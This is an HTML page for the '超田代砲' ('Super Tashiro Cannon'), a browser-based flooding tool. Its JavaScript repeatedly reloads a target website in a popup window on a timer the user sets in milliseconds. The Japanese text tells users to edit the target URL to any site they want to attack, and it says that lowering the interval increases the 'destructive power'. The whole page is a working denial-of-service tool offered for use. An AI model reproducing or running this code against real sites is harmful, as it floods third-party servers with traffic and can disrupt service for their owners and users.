<html> <body bgcolor="#000000" text="#ffffff"> <center><font size=7 color="#ff0000">超田代砲</font></center><hr>
Interval (ミリ秒)
<input type="text"name="ival"value="1">
<input type="button"value="超田代砲発射!!"onClick="c();">
<script type="text/JavaScript">
var tid;
var ta="
http://cappesoft.hp.infoseek.co.jp/";
w=window.open(ta,'san','WIDTH=512,height=350');
function c(){
w.location=ta;
tid=setTimeout("c()",ival.value);
}
</script><hr>
</font size="7"><font color="white">
<h1>攻撃ターゲットの変更法</h1>
このHTMLをメモ帳、秀丸エディタ等で開き、<br>
8行目の"var ta="
http://""内を任意のURLに変更して行います。<br>
"Interval"の値は下げるほど破壊力が上がりますが、<br>
同時にマシンへのトラフィックも増加します。<br>
ほどほどに設定して下さい
</body></html>